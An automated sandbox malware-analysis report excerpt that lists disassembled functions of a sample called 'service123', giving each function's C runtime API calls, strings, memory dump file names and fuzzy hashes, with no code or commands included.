Instruction Fuzzy Hash: 1051BB71B0A2218FD701DF2AD59465AFBF5AF82318F118A6DE5848BB18E731D805CF82

Function 6C31E980 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C31E9AA
wcslen.MSVCRT ref: 6C31EA1A

Strings

basic_string: construction from null is not valid, xrefs: 6C31E9E2, 6C31EA52, 6C31EAC2

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: strlenwcslen
String ID: basic_string: construction from null is not valid
API String ID: 803329031-2991274800
Opcode ID: 90903a793c9d4cb3e8843eea7c7cf999cd929f94d3545463b6e878dee3c4cc70
Instruction ID: e5ec62e814fd5b2e665e1b66deaceb582e66ea5a2af8c4e7b43700dc0643e34b
Opcode Fuzzy Hash: 90903a793c9d4cb3e8843eea7c7cf999cd929f94d3545463b6e878dee3c4cc70
Instruction Fuzzy Hash: A4419FF2A097108FCB04EF2CD48584AB7E0BB45314F164979E9858BB14E332E995CFD2

Function 6C31E581 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C31E5AD
strlen.MSVCRT ref: 6C31E5FD

Strings

basic_string: construction from null is not valid, xrefs: 6C31E5CF, 6C31E61F, 6C31E66F

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid
API String ID: 39653677-2991274800
Opcode ID: 763846b681ae6563f8e34eed8ecc6428630cba5d5d533203c9d3cd13654e88d8
Instruction ID: 6461eacce3dd1d42a1249d4427ec023d931f3d9c050e21bb6ba8d485bb1f73bd
Opcode Fuzzy Hash: 763846b681ae6563f8e34eed8ecc6428630cba5d5d533203c9d3cd13654e88d8
Instruction Fuzzy Hash: 333132B26153548FCB00AF2CC48589ABBE4BF09618F46496DE8C49B711D336EC99CF93

Function 00C17C40 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 00C17C92
MultiByteToWideChar.KERNEL32 ref: 00C17CD5

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 2a7f027cd37dad5cbc17c0b9f92a8868624349e38e3eb4801532d9aa252dfc7a
Instruction ID: 2cc0bd2d03398a5f281b3661aac32518835758d580a54b52ecdafb88fab65ca7
Opcode Fuzzy Hash: 2a7f027cd37dad5cbc17c0b9f92a8868624349e38e3eb4801532d9aa252dfc7a
Instruction Fuzzy Hash: 323115B050C3418FD710DF29E4843AABBF0BF86304F048A1DE8A48B351E776D989DB92

Function 6C309660 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 6C3096B2
MultiByteToWideChar.KERNEL32 ref: 6C3096F5

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 48911e8524fcc59b068c477dcbde30a9627103189904aee2b8c10e68d99c37b2
Instruction ID: b580bc0c3202404c3086b94e272052f4f9d794ef6759e2d3ed14c86130569313
Opcode Fuzzy Hash: 48911e8524fcc59b068c477dcbde30a9627103189904aee2b8c10e68d99c37b2
Instruction Fuzzy Hash: 6C31F2B66093418FD700DF29E18425ABBF0BF8A719F14892DE8D48B651E3B6D948CF53

Function 6C2FF511 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C2FF5C1

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: fa4f4fe3ffed0a83b080aafa559989ab4e29ca9fc14af5b02c75614eb4edd39f
Instruction ID: bff0773710c6f919e5f08a6ae4cfd7fc60f86d22fe66495be7b4420c2c342c7f
Opcode Fuzzy Hash: fa4f4fe3ffed0a83b080aafa559989ab4e29ca9fc14af5b02c75614eb4edd39f
Instruction Fuzzy Hash: 97415870A8930A8FDB00EF29D58475BBBF4BB46318F15861CECA84BA54D731E546CB92

Function 6C2FF6B0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C2FF751

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: 5befe5890840c10e910e56177a10d180443e384fc9bbcfb61a38afdea868dc3a
Instruction ID: 797732e699b34cf421cde1835fa660342e50ff0bf7a39438f72e9f1be1bb4740
Opcode Fuzzy Hash: 5befe5890840c10e910e56177a10d180443e384fc9bbcfb61a38afdea868dc3a
Instruction Fuzzy Hash: F5317C706893098FDB00EF29C58571BBBF0BB46319F15861DECA84BA94D331E506CF92

Function 6C2FF9D1 Relevance: 6.1, APIs: 4, Instructions: 81synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C2FFA72
CreateSemaphoreW.KERNEL32 ref: 6C2FFAB7
WaitForSingleObject.KERNEL32 ref: 6C2FFB00

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 8031385191eeff3bf5a89481ff335bde87f1996c0a091045f2999c8512026f4c
Instruction ID: c4b626f80b3558e40523ba76a6cc6ff5840c10eaaeaf8415db0f1296e6c4b3e4
Opcode Fuzzy Hash: 8031385191eeff3bf5a89481ff335bde87f1996c0a091045f2999c8512026f4c
Instruction Fuzzy Hash: 7D3118706893098FDB10EF2DC58575BBBF4BB4A319F15865CECA887680D331E646CB92

Function 6C2FFB60 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C2FFBF2
CreateSemaphoreW.KERNEL32 ref: 6C2FFC37
WaitForSingleObject.KERNEL32 ref: 6C2FFC80

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: f849e923375621deae5c1b3e5a76a067fa7c836f426a1e3741a218f322a525f6
Instruction ID: 5ffa28476c403e365571daccb6a59a8eae609d50728cfb11138edfc11fc811b9
Opcode Fuzzy Hash: f849e923375621deae5c1b3e5a76a067fa7c836f426a1e3741a218f322a525f6
Instruction Fuzzy Hash: F33138706893198FDB00EF29C19571BBBF4BB46359F018258ECA88BA84C335E546CF92

Function 6C2F55A8 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2F72FE

Strings

this, xrefs: 6C2F55B3
{parm#, xrefs: 6C2F72D9
}, xrefs: 6C2F7392

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID: this${parm#$}
API String ID: 39653677-3278767634
Opcode ID: 845ef6f6dc5983d7ff2ac3be4f14e4c1d04358b12a0b16f71bb0fa887fa5056b
Instruction ID: 3994074d3b0eb2375def68247ede5e609f68ed960a0dcbc6e26c7375f452bbfd
Opcode Fuzzy Hash: 845ef6f6dc5983d7ff2ac3be4f14e4c1d04358b12a0b16f71bb0fa887fa5056b
Instruction Fuzzy Hash: 9D21A37154D34ACFD7018F18C0807A9BBA1AF91704F19C5BEDCD84FA4AC77594868BA2

Function 00C11001 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 00C1106B
__p__fmode.MSVCRT ref: 00C11070
__p__commode.MSVCRT ref: 00C1107D

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type
String ID:
API String ID: 3338496922-0
Opcode ID: 1ba31213ac94ba65a3ebaa540aa38efd9c2fb0319e247863e1bc92581bd556c3
Instruction ID: f1cdbeb9b9c9afcd5bdcfc4fd40d4ef1c6effa6e4bdbee64626c9576244334cf
Opcode Fuzzy Hash: 1ba31213ac94ba65a3ebaa540aa38efd9c2fb0319e247863e1bc92581bd556c3
Instruction Fuzzy Hash: EA216A70900201CBC710EF20D9453EA37B1BB0B344FA98668DA694B256E77ED9C7FB91

Function 6C369F70 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C369F85
strlen.MSVCRT ref: 6C369F8F
memcpy.MSVCRT ref: 6C369FB8
setlocale.MSVCRT ref: 6C369FCC

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: e8d6e49a0a96f5e11a8d26abc4c5c54dc4c7b49d2a7fbef2e950571d690094a3
Instruction ID: 9ef813ead6d9063088fdb6e1a42706213c2914fa25887c87d010388c971f175a
Opcode Fuzzy Hash: e8d6e49a0a96f5e11a8d26abc4c5c54dc4c7b49d2a7fbef2e950571d690094a3
Instruction Fuzzy Hash: 3BF0DAB26093119AD3007F68D4463AFBAE4EF80654F028D1DE4C88B711D775D4489F93

Function 00C14558 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

u, xrefs: 00C14596
@, xrefs: 00C14647

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: 4e6f781a8f5ea45eda43ec793d27afd7f025c5b847f073a8708d81aa63ba193b
Instruction ID: 7aea7e8b7850b6e8fef0d473a31bacc6c2982a9c0223098e0eee6261a4ede2da
Opcode Fuzzy Hash: 4e6f781a8f5ea45eda43ec793d27afd7f025c5b847f073a8708d81aa63ba193b
Instruction Fuzzy Hash: F8A1807550C3958BC734CF25C0503EABBE2BB86314F148A1DE8ED97251D735DA85EB82

Function 6C304C28 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

u, xrefs: 6C304C66
@, xrefs: 6C304D17

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: a1880444071c40c11e7de43b867e91e7e0ddeb865448957f78c489773285374b
Instruction ID: 5b15bf2f6d49cb9942c51f6eeda9b306a594123c894555b05b2b1755cd212c2e
Opcode Fuzzy Hash: a1880444071c40c11e7de43b867e91e7e0ddeb865448957f78c489773285374b
Instruction Fuzzy Hash: 5DA18A7270C3958BD720CF25C09039ABBE5BF95318F148A5DE8D887681D736DA49CF86

Function 00C14C21 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00C14DBE

Part of subcall function 00C12830: fputc.MSVCRT ref: 00C128F8

Strings

(null), xrefs: 00C14C27
@, xrefs: 00C14647

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: 06b5c2a449fbdf09ae19e94972bf74bccda12bceb42a6464cf54b7a7bc2f6ca8
Instruction ID: 64272f579ba1eb4ab42f44f841751206889c3688d38d88722a910ca1f0d4d2a4
Opcode Fuzzy Hash: 06b5c2a449fbdf09ae19e94972bf74bccda12bceb42a6464cf54b7a7bc2f6ca8
Instruction Fuzzy Hash: F8919F755083958BD7258F24C0903EABBE2BF86714F14861DD8EC97381D735DA86EB82

Function 6C3052F1 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C30548E

Part of subcall function 6C302F00: fputc.MSVCRT ref: 6C302FC8

Strings

@, xrefs: 6C304D17
(null), xrefs: 6C3052F7

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: de0fccb5829fcf180e106aa801b0ca355f73966336c5cf574f167570b521c704
Instruction ID: 575765dd241e9ac422e94960af363a67e45ddc2e32b2e8c4a915d917682b96da
Opcode Fuzzy Hash: de0fccb5829fcf180e106aa801b0ca355f73966336c5cf574f167570b521c704
Instruction Fuzzy Hash: EF918A7270C3958BD721CE24C09039ABBE5BF85318F148A5DE8D887781D736DA4ACF86

Function 6C385DB0 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C385DEA
wcslen.MSVCRT ref: 6C385E7C
wcslen.MSVCRT ref: 6C385F0E
strlen.MSVCRT ref: 6C385FA0

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: ce8998f6dd104e10654be7a10b4924e65e18691104ef0775ac71f6925997b530
Instruction ID: be9937ceb45bf256e1f23f5e96535ddecfe780d95ef3035ef6b57b8ac24f8eb7
Opcode Fuzzy Hash: ce8998f6dd104e10654be7a10b4924e65e18691104ef0775ac71f6925997b530
Instruction Fuzzy Hash: D3F15BB4A056058FCB00DF6CC4849AEBBF1BF84314F118A69E895CBB55E735E945CF82

Function 6C3855D0 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C38560A
wcslen.MSVCRT ref: 6C38569C
wcslen.MSVCRT ref: 6C38572E
strlen.MSVCRT ref: 6C3857C0

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: ab3f31edad0aa74fab684f2e7a4adbc757dfd6a1cccee78e9bc88bf8290624e0
Instruction ID: b9a8b66cd2f075d76a53941c52bef7e6e074304751f01e7bb15dd5a621f7c945
Opcode Fuzzy Hash: ab3f31edad0aa74fab684f2e7a4adbc757dfd6a1cccee78e9bc88bf8290624e0
Instruction Fuzzy Hash: 54F13AB4A066058FDB00DF6CC0849AEBBF0BF84314B518A59E896DB754E735E945CF82

Function 00C129B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00C12A31

Strings

NaN, xrefs: 00C129B1

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction ID: f437e7960844cc3a4acdfe240d747affecd81e8a32774a474a1314c2f9efaeb0
Opcode Fuzzy Hash: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction Fuzzy Hash: DB412875A04215CBDB20CF18C4C0796B7E1AF8A700F298299DC988F34AD332DD92AB90

Function 6C303080 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C303101

Strings

NaN, xrefs: 6C303081

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction ID: 43824e1752b317612764fcf14b2bf99ae77bc358a6f85d31e5aa405ad65e23fd
Opcode Fuzzy Hash: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
